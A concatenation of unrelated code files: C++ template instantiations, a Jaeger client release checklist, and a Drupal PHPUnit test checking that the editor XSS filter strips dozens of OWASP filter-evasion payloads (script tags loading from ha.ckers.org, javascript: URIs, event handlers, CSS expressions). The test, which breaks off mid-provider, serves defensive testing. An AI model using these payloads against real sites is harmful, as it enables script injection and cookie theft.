template class FP<int64_t,uint16_t*>;
template class FP<int64_t,int32_t>;
template class FP<int64_t,int32_t*>;
template class FP<int64_t,uint32_t>;
template class FP<int64_t,uint32_t*>;
template class FP<int64_t,int64_t>;
template class FP<int64_t,int64_t*>;
template class FP<int64_t,uint64_t>;
template class FP<int64_t,uint64_t*>;
template class FP<int64_t,bool>;
template class FP<int64_t,bool*>;
template class FP<int64_t,float>;
template class FP<int64_t,float*>;
template class FP<int64_t,double>;
template class FP<int64_t,double*>;
// retT = int64_t*
template class FP<int64_t*,char>;
template class FP<int64_t*,char*>;
template class FP<int64_t*,int8_t>;
template class FP<int64_t*,int8_t*>;
template class FP<int64_t*,uint8_t>;
template class FP<int64_t*,uint8_t*>;
template class FP<int64_t*,int16_t>;
template class FP<int64_t*,int16_t*>;
template class FP<int64_t*,uint16_t>;
template class FP<int64_t*,uint16_t*>;
template class FP<int64_t*,int32_t>;
template class FP<int64_t*,int32_t*>;
template class FP<int64_t*,uint32_t>;
template class FP<int64_t*,uint32_t*>;
template class FP<int64_t*,int64_t>;
template class FP<int64_t*,int64_t*>;
template class FP<int64_t*,uint64_t>;
template class FP<int64_t*,uint64_t*>;
template class FP<int64_t*,bool>;
template class FP<int64_t*,bool*>;
template class FP<int64_t*,float>;
template class FP<int64_t*,float*>;
template class FP<int64_t*,double>;
template class FP<int64_t*,double*>;
// retT = uint64_t
template class FP<uint64_t,char>;
template class FP<uint64_t,char*>;
template class FP<uint64_t,int8_t>;
template class FP<uint64_t,int8_t*>;
template class FP<uint64_t,uint8_t>;
template class FP<uint64_t,uint8_t*>;
template class FP<uint64_t,int16_t>;
template class FP<uint64_t,int16_t*>;
template class FP<uint64_t,uint16_t>;
template class FP<uint64_t,uint16_t*>;
template class FP<uint64_t,int32_t>;
template class FP<uint64_t,int32_t*>;
template class FP<uint64_t,uint32_t>;
template class FP<uint64_t,uint32_t*>;
template class FP<uint64_t,int64_t>;
template class FP<uint64_t,int64_t*>;
template class FP<uint64_t,uint64_t>;
template class FP<uint64_t,uint64_t*>;
template class FP<uint64_t,bool>;
template class FP<uint64_t,bool*>;
template class FP<uint64_t,float>;
template class FP<uint64_t,float*>;
template class FP<uint64_t,double>;
template class FP<uint64_t,double*>;
// retT = uint64_t*
template class FP<uint64_t*,char>;
template class FP<uint64_t*,char*>;
template class FP<uint64_t*,int8_t>;
template class FP<uint64_t*,int8_t*>;
template class FP<uint64_t*,uint8_t>;
template class FP<uint64_t*,uint8_t*>;
template class FP<uint64_t*,int16_t>;
template class FP<uint64_t*,int16_t*>;
template class FP<uint64_t*,uint16_t>;
template class FP<uint64_t*,uint16_t*>;
template class FP<uint64_t*,int32_t>;
template class FP<uint64_t*,int32_t*>;
template class FP<uint64_t*,uint32_t>;
template class FP<uint64_t*,uint32_t*>;
template class FP<uint64_t*,int64_t>;
template class FP<uint64_t*,int64_t*>;
template class FP<uint64_t*,uint64_t>;
template class FP<uint64_t*,uint64_t*>;
template class FP<uint64_t*,bool>;
template class FP<uint64_t*,bool*>;
template class FP<uint64_t*,float>;
template class FP<uint64_t*,float*>;
template class FP<uint64_t*,double>;
template class FP<uint64_t*,double*>;
// retT = float
template class FP<float,char>;
template class FP<float,char*>;
template class FP<float,int8_t>;
template class FP<float,int8_t*>;
template class FP<float,uint8_t>;
template class FP<float,uint8_t*>;
template class FP<float,int16_t>;
template class FP<float,int16_t*>;
template class FP<float,uint16_t>;
template class FP<float,uint16_t*>;
template class FP<float,int32_t>;
template class FP<float,int32_t*>;
template class FP<float,uint32_t>;
template class FP<float,uint32_t*>;
template class FP<float,int64_t>;
template class FP<float,int64_t*>;
template class FP<float,uint64_t>;
template class FP<float,uint64_t*>;
template class FP<float,bool>;
template class FP<float,bool*>;
template class FP<float,float>;
template class FP<float,float*>;
template class FP<float,double>;
template class FP<float,double*>;
// retT = float*
template class FP<float*,char>;
template class FP<float*,char*>;
template class FP<float*,int8_t>;
template class FP<float*,int8_t*>;
template class FP<float*,uint8_t>;
template class FP<float*,uint8_t*>;
template class FP<float*,int16_t>;
template class FP<float*,int16_t*>;
template class FP<float*,uint16_t>;
template class FP<float*,uint16_t*>;
template class FP<float*,int32_t>;
template class FP<float*,int32_t*>;
template class FP<float*,uint32_t>;
template class FP<float*,uint32_t*>;
template class FP<float*,int64_t>;
template class FP<float*,int64_t*>;
template class FP<float*,uint64_t>;
template class FP<float*,uint64_t*>;
template class FP<float*,bool>;
template class FP<float*,bool*>;
template class FP<float*,float>;
template class FP<float*,float*>;
template class FP<float*,double>;
template class FP<float*,double*>;
// retT = double
template class FP<double,char>;
template class FP<double,char*>;
template class FP<double,int8_t>;
template class FP<double,int8_t*>;
template class FP<double,uint8_t>;
template class FP<double,uint8_t*>;
template class FP<double,int16_t>;
template class FP<double,int16_t*>;
template class FP<double,uint16_t>;
template class FP<double,uint16_t*>;
template class FP<double,int32_t>;
template class FP<double,int32_t*>;
template class FP<double,uint32_t>;
template class FP<double,uint32_t*>;
template class FP<double,int64_t>;
template class FP<double,int64_t*>;
template class FP<double,uint64_t>;
template class FP<double,uint64_t*>;
template class FP<double,bool>;
template class FP<double,bool*>;
template class FP<double,float>;
template class FP<double,float*>;
template class FP<double,double>;
template class FP<double,double*>;
// retT = double*
template class FP<double*,char>;
template class FP<double*,char*>;
template class FP<double*,int8_t>;
template class FP<double*,int8_t*>;
template class FP<double*,uint8_t>;
template class FP<double*,uint8_t*>;
template class FP<double*,int16_t>;
template class FP<double*,int16_t*>;
template class FP<double*,uint16_t>;
template class FP<double*,uint16_t*>;
template class FP<double*,int32_t>;
template class FP<double*,int32_t*>;
template class FP<double*,uint32_t>;
template class FP<double*,uint32_t*>;
template class FP<double*,int64_t>;
template class FP<double*,int64_t*>;
template class FP<double*,uint64_t>;
template class FP<double*,uint64_t*>;
template class FP<double*,bool>;
template class FP<double*,bool*>;
template class FP<double*,float>;
template class FP<double*,float*>;
template class FP<double*,double>;
template class FP<double*,double*>;
// retT = char / char* (narrower argument set, including const char*)
template class FP<char, char>;
template class FP<char, char*>;
template class FP<char, const char*>;
template class FP<char*, char>;
template class FP<char*, char*>;
template class FP<char*, const char*>;
| {
"pile_set_name": "Github"
} |
# Release Process
1. Create a PR "Preparing for release X.Y.Z" against master branch
* Alter CHANGELOG.md from `<placeholder_version> (unreleased)` to `<X.Y.Z> (YYYY-MM-DD)`
* Update `JaegerClientVersion` in constants.go to `Go-X.Y.Z`
2. Create a release "Release X.Y.Z" on GitHub
* Create Tag `vX.Y.Z`
* Copy CHANGELOG.md into the release notes
3. Create a PR "Back to development" against master branch
* Add `<next_version> (unreleased)` to CHANGELOG.md
* Update `JaegerClientVersion` in constants.go to `Go-<next_version>dev`
| {
"pile_set_name": "Github"
} |
<?php
namespace Drupal\Tests\editor\Unit\EditorXssFilter;
use Drupal\editor\EditorXssFilter\Standard;
use Drupal\Tests\UnitTestCase;
use Drupal\filter\Plugin\FilterInterface;
/**
* @coversDefaultClass \Drupal\editor\EditorXssFilter\Standard
* @group editor
*/
class StandardTest extends UnitTestCase {
/**
* The mocked text format configuration entity.
*
* @var \Drupal\filter\Entity\FilterFormat|\PHPUnit_Framework_MockObject_MockObject
*/
protected $format;
  /**
   * {@inheritdoc}
   *
   * Builds the mocked text format used by every test case: a format whose
   * only filter type is TYPE_HTML_RESTRICTOR and whose HTML restrictions
   * allow <p> and <a>, while forbidding the "style" attribute and all
   * "on*" (event handler) attributes on every tag.
   */
  protected function setUp() {
    // Mock text format configuration entity object.
    $this->format = $this->getMockBuilder('\Drupal\filter\Entity\FilterFormat')
      ->disableOriginalConstructor()
      ->getMock();
    // The format reports exactly one filter type: an HTML restrictor.
    $this->format->expects($this->any())
      ->method('getFilterTypes')
      ->will($this->returnValue([FilterInterface::TYPE_HTML_RESTRICTOR]));
    // Restrictions returned by getHtmlRestrictions(): <p> and <a> are
    // allowed; on any tag ('*') "style" and "on*" attributes are FALSE,
    // i.e. explicitly disallowed.
    $restrictions = [
      'allowed' => [
        'p' => TRUE,
        'a' => TRUE,
        '*' => [
          'style' => FALSE,
          'on*' => FALSE,
        ],
      ],
    ];
    $this->format->expects($this->any())
      ->method('getHtmlRestrictions')
      ->will($this->returnValue($restrictions));
  }
/**
* Provides test data for testFilterXss().
*
* @see \Drupal\Tests\editor\Unit\editor\EditorXssFilter\StandardTest::testFilterXss()
*/
public function providerTestFilterXss() {
$data = [];
$data[] = ['<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>', '<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>'];
$data[] = ['<p style="color:red">Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>', '<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>'];
$data[] = ['<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown><script>alert("evil");</script>', '<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown>alert("evil");'];
$data[] = ['<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown><a href="javascript:alert(1)">test</a>', '<p>Hello, world!</p><unknown>Pink Fairy Armadillo</unknown><a href="alert(1)">test</a>'];
// All cases listed on https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
// No Filter Evasion.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_Filter_Evasion
$data[] = ['<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>', ''];
// Image XSS using the JavaScript directive.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Image_XSS_using_the_JavaScript_directive
$data[] = ['<IMG SRC="javascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// No quotes and no semicolon.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_quotes_and_no_semicolon
$data[] = ['<IMG SRC=javascript:alert(\'XSS\')>', '<IMG>'];
// Case insensitive XSS attack vector.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Case_insensitive_XSS_attack_vector
$data[] = ['<IMG SRC=JaVaScRiPt:alert(\'XSS\')>', '<IMG>'];
// HTML entities.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#HTML_entities
$data[] = ['<IMG SRC=javascript:alert("XSS")>', '<IMG>'];
// Grave accent obfuscation.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Grave_accent_obfuscation
$data[] = ['<IMG SRC=`javascript:alert("RSnake says, \'XSS\'")`>', '<IMG>'];
// Malformed A tags.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Malformed_A_tags
$data[] = ['<a onmouseover="alert(document.cookie)">xxs link</a>', '<a>xxs link</a>'];
$data[] = ['<a onmouseover=alert(document.cookie)>xxs link</a>', '<a>xxs link</a>'];
// Malformed IMG tags.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Malformed_IMG_tags
$data[] = ['<IMG """><SCRIPT>alert("XSS")</SCRIPT>">', '<IMG>alert("XSS")">'];
// fromCharCode.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#fromCharCode
$data[] = ['<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>', '<IMG src="alert(String.fromCharCode(88,83,83))">'];
// Default SRC tag to get past filters that check SRC domain.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_to_get_past_filters_that_check_SRC_domain
$data[] = ['<IMG SRC=# onmouseover="alert(\'xxs\')">', '<IMG src="#">'];
// Default SRC tag by leaving it empty.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_by_leaving_it_empty
$data[] = ['<IMG SRC= onmouseover="alert(\'xxs\')">', '<IMG nmouseover="alert('xxs')">'];
// Default SRC tag by leaving it out entirely.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Default_SRC_tag_by_leaving_it_out_entirely
$data[] = ['<IMG onmouseover="alert(\'xxs\')">', '<IMG>'];
// Decimal HTML character references.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Decimal_HTML_character_references
$data[] = ['<IMG SRC=javascript:alert('XSS')>', '<IMG src="alert('XSS')">'];
// Decimal HTML character references without trailing semicolons.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Decimal_HTML_character_references_without_trailing_semicolons
$data[] = ['<IMG SRC=javascript:alert('XSS')>', '<IMG src="&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041">'];
// Hexadecimal HTML character references without trailing semicolons.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Hexadecimal_HTML_character_references_without_trailing_semicolons
$data[] = ['<IMG SRC=javascript:alert('XSS')>', '<IMG src="&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29">'];
// Embedded tab.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_tab
$data[] = ['<IMG SRC="jav ascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// Embedded Encoded tab.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_Encoded_tab
$data[] = ['<IMG SRC="jav	ascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// Embedded newline to break up XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_newline_to_break_up_XSS
$data[] = ['<IMG SRC="jav
ascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// Embedded carriage return to break up XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Embedded_carriage_return_to_break_up_XSS
$data[] = ['<IMG SRC="jav
ascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
// Null breaks up JavaScript directive.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Null_breaks_up_JavaScript_directive
$data[] = ["<IMG SRC=java\0script:alert(\"XSS\")>", '<IMG>'];
// Spaces and meta chars before the JavaScript in images for XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Spaces_and_meta_chars_before_the_JavaScript_in_images_for_XSS
// @fixme This dataset currently fails under 5.4 because of
// https://www.drupal.org/node/1210798. Restore after it's fixed.
if (version_compare(PHP_VERSION, '5.4.0', '<')) {
$data[] = ['<IMG SRC="  javascript:alert(\'XSS\');">', '<IMG src="alert('XSS');">'];
}
// Non-alpha-non-digit XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Non-alpha-non-digit_XSS
$data[] = ['<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>', ''];
$data[] = ['<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>', '<BODY>'];
$data[] = ['<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>', ''];
// Extraneous open brackets.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Extraneous_open_brackets
$data[] = ['<<SCRIPT>alert("XSS");//<</SCRIPT>', '<alert("XSS");//<'];
// No closing script tags.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#No_closing_script_tags
$data[] = ['<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >', ''];
// Protocol resolution in script tags.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Protocol_resolution_in_script_tags
$data[] = ['<SCRIPT SRC=//ha.ckers.org/.j>', ''];
// Half open HTML/JavaScript XSS vector.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Half_open_HTML.2FJavaScript_XSS_vector
$data[] = ['<IMG SRC="javascript:alert(\'XSS\')"', '<IMG src="alert('XSS')">'];
// Double open angle brackets.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Double_open_angle_brackets
// @see http://ha.ckers.org/blog/20060611/hotbot-xss-vulnerability/ to
// understand why this is a vulnerability.
$data[] = ['<iframe src=http://ha.ckers.org/scriptlet.html <', '<iframe src="http://ha.ckers.org/scriptlet.html">'];
// Escaping JavaScript escapes.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Escaping_JavaScript_escapes
// This one is irrelevant for Drupal; we *never* output any JavaScript code
// that depends on the URL's query string.
// End title tag.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#End_title_tag
$data[] = ['</TITLE><SCRIPT>alert("XSS");</SCRIPT>', '</TITLE>alert("XSS");'];
// INPUT image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#INPUT_image
$data[] = ['<INPUT TYPE="IMAGE" SRC="javascript:alert(\'XSS\');">', '<INPUT type="IMAGE" src="alert('XSS');">'];
// BODY image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BODY_image
$data[] = ['<BODY BACKGROUND="javascript:alert(\'XSS\')">', '<BODY background="alert('XSS')">'];
// IMG Dynsrc.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_Dynsrc
$data[] = ['<IMG DYNSRC="javascript:alert(\'XSS\')">', '<IMG dynsrc="alert('XSS')">'];
// IMG lowsrc.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_lowsrc
$data[] = ['<IMG LOWSRC="javascript:alert(\'XSS\')">', '<IMG lowsrc="alert('XSS')">'];
// List-style-image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#List-style-image
$data[] = ['<STYLE>li {list-style-image: url("javascript:alert(\'XSS\')");}</STYLE><UL><LI>XSS</br>', 'li {list-style-image: url("javascript:alert(\'XSS\')");}<UL><LI>XSS</br>'];
// VBscript in an image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#VBscript_in_an_image
$data[] = ['<IMG SRC=\'vbscript:msgbox("XSS")\'>', '<IMG src=\'msgbox("XSS")\'>'];
// Livescript (older versions of Netscape only).
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Livescript_.28older_versions_of_Netscape_only.29
$data[] = ['<IMG SRC="livescript:[code]">', '<IMG src="[code]">'];
// BODY tag.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BODY_tag
$data[] = ['<BODY ONLOAD=alert(\'XSS\')>', '<BODY>'];
// Event handlers.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Event_Handlers
$events = [
'onAbort',
'onActivate',
'onAfterPrint',
'onAfterUpdate',
'onBeforeActivate',
'onBeforeCopy',
'onBeforeCut',
'onBeforeDeactivate',
'onBeforeEditFocus',
'onBeforePaste',
'onBeforePrint',
'onBeforeUnload',
'onBeforeUpdate',
'onBegin',
'onBlur',
'onBounce',
'onCellChange',
'onChange',
'onClick',
'onContextMenu',
'onControlSelect',
'onCopy',
'onCut',
'onDataAvailable',
'onDataSetChanged',
'onDataSetComplete',
'onDblClick',
'onDeactivate',
'onDrag',
'onDragEnd',
'onDragLeave',
'onDragEnter',
'onDragOver',
'onDragDrop',
'onDragStart',
'onDrop',
'onEnd',
'onError',
'onErrorUpdate',
'onFilterChange',
'onFinish',
'onFocus',
'onFocusIn',
'onFocusOut',
'onHashChange',
'onHelp',
'onInput',
'onKeyDown',
'onKeyPress',
'onKeyUp',
'onLayoutComplete',
'onLoad',
'onLoseCapture',
'onMediaComplete',
'onMediaError',
'onMessage',
'onMousedown',
'onMouseEnter',
'onMouseLeave',
'onMouseMove',
'onMouseOut',
'onMouseOver',
'onMouseUp',
'onMouseWheel',
'onMove',
'onMoveEnd',
'onMoveStart',
'onOffline',
'onOnline',
'onOutOfSync',
'onPaste',
'onPause',
'onPopState',
'onProgress',
'onPropertyChange',
'onReadyStateChange',
'onRedo',
'onRepeat',
'onReset',
'onResize',
'onResizeEnd',
'onResizeStart',
'onResume',
'onReverse',
'onRowsEnter',
'onRowExit',
'onRowDelete',
'onRowInserted',
'onScroll',
'onSeek',
'onSelect',
'onSelectionChange',
'onSelectStart',
'onStart',
'onStop',
'onStorage',
'onSyncRestored',
'onSubmit',
'onTimeError',
'onTrackChange',
'onUndo',
'onUnload',
'onURLFlip',
];
foreach ($events as $event) {
$data[] = ['<p ' . $event . '="javascript:alert(\'XSS\');">Dangerous llama!</p>', '<p>Dangerous llama!</p>'];
}
// BGSOUND.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BGSOUND
$data[] = ['<BGSOUND SRC="javascript:alert(\'XSS\');">', '<BGSOUND src="alert('XSS');">'];
// & JavaScript includes.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#.26_JavaScript_includes
$data[] = ['<BR SIZE="&{alert(\'XSS\')}">', '<BR size="">'];
// STYLE sheet.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_sheet
$data[] = ['<LINK REL="stylesheet" HREF="javascript:alert(\'XSS\');">', ''];
// Remote style sheet.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet
$data[] = ['<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">', ''];
// Remote style sheet part 2.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_2
$data[] = ['<STYLE>@import\'http://ha.ckers.org/xss.css\';</STYLE>', '@import\'http://ha.ckers.org/xss.css\';'];
// Remote style sheet part 3.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_3
$data[] = ['<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">', '<META http-equiv="Link">; REL=stylesheet">'];
// Remote style sheet part 4.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Remote_style_sheet_part_4
$data[] = ['<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>', 'BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}'];
// STYLE tags with broken up JavaScript for XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tags_with_broken_up_JavaScript_for_XSS
$data[] = ['<STYLE>@im\port\'\ja\vasc\ript:alert("XSS")\';</STYLE>', '@im\port\'\ja\vasc\ript:alert("XSS")\';'];
// STYLE attribute using a comment to break up expression.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_attribute_using_a_comment_to_break_up_expression
$data[] = ['<IMG STYLE="xss:expr/*XSS*/ession(alert(\'XSS\'))">', '<IMG>'];
// IMG STYLE with expression.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IMG_STYLE_with_expression
$data[] = ['exp/*<A STYLE=\'no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))\'>', 'exp/*<A>'];
// STYLE tag (Older versions of Netscape only).
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_.28Older_versions_of_Netscape_only.29
$data[] = ['<STYLE TYPE="text/javascript">alert(\'XSS\');</STYLE>', 'alert(\'XSS\');'];
// STYLE tag using background-image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_using_background-image
$data[] = ['<STYLE>.XSS{background-image:url("javascript:alert(\'XSS\')");}</STYLE><A CLASS=XSS></A>', '.XSS{background-image:url("javascript:alert(\'XSS\')");}<A class="XSS"></A>'];
// STYLE tag using background.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#STYLE_tag_using_background
$data[] = ['<STYLE type="text/css">BODY{background:url("javascript:alert(\'XSS\')")}</STYLE>', 'BODY{background:url("javascript:alert(\'XSS\')")}'];
// Anonymous HTML with STYLE attribute.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Anonymous_HTML_with_STYLE_attribute
$data[] = ['<XSS STYLE="xss:expression(alert(\'XSS\'))">', '<XSS>'];
// Local htc file.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Local_htc_file
$data[] = ['<XSS STYLE="behavior: url(xss.htc);">', '<XSS>'];
// US-ASCII encoding.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#US-ASCII_encoding
// This one is irrelevant for Drupal; Drupal *always* outputs UTF-8.
// META.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META
$data[] = ['<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(\'XSS\');">', '<META http-equiv="refresh" content="alert('XSS');">'];
// META using data.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META_using_data
$data[] = ['<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">', '<META http-equiv="refresh" content="text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">'];
// META with additional URL parameter
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#META
$data[] = ['<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert(\'XSS\');">', '<META http-equiv="refresh" content="//;URL=javascript:alert('XSS');">'];
// IFRAME.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IFRAME
$data[] = ['<IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>', '<IFRAME src="alert('XSS');"></IFRAME>'];
// IFRAME Event based.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#IFRAME_Event_based
$data[] = ['<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>', '<IFRAME src="#"></IFRAME>'];
// FRAME.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#FRAME
$data[] = ['<FRAMESET><FRAME SRC="javascript:alert(\'XSS\');"></FRAMESET>', '<FRAMESET><FRAME src="alert('XSS');"></FRAMESET>'];
// TABLE.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#TABLE
$data[] = ['<TABLE BACKGROUND="javascript:alert(\'XSS\')">', '<TABLE background="alert('XSS')">'];
// TD.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#TD
$data[] = ['<TABLE><TD BACKGROUND="javascript:alert(\'XSS\')">', '<TABLE><TD background="alert('XSS')">'];
// DIV background-image.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image
$data[] = ['<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">', '<DIV>'];
// DIV background-image with unicoded XSS exploit.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image_with_unicoded_XSS_exploit
$data[] = ['<DIV STYLE="background-image:\0075\0072\006C\0028\'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029\'\0029">', '<DIV>'];
// DIV background-image plus extra characters.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_background-image_plus_extra_characters
$data[] = ['<DIV STYLE="background-image: url(javascript:alert(\'XSS\'))">', '<DIV>'];
// DIV expression.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#DIV_expression
$data[] = ['<DIV STYLE="width: expression(alert(\'XSS\'));">', '<DIV>'];
// Downlevel-Hidden block.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Downlevel-Hidden_block
$data[] = ['<!--[if gte IE 4]>
<SCRIPT>alert(\'XSS\');</SCRIPT>
<![endif]-->', "\n alert('XSS');\n "];
// BASE tag.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#BASE_tag
$data[] = ['<BASE HREF="javascript:alert(\'XSS\');//">', '<BASE href="alert('XSS');//">'];
// OBJECT tag.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#OBJECT_tag
$data[] = ['<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>', ''];
// Using an EMBED tag you can embed a Flash movie that contains XSS.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#Using_an_EMBED_tag_you_can_embed_a_Flash_movie_that_contains_XSS
$data[] = ['<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>', ''];
// You can EMBED SVG which can contain your XSS vector.
// @see https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet#You_can_EMBED_SVG_which_can_contain_your_XSS_vector
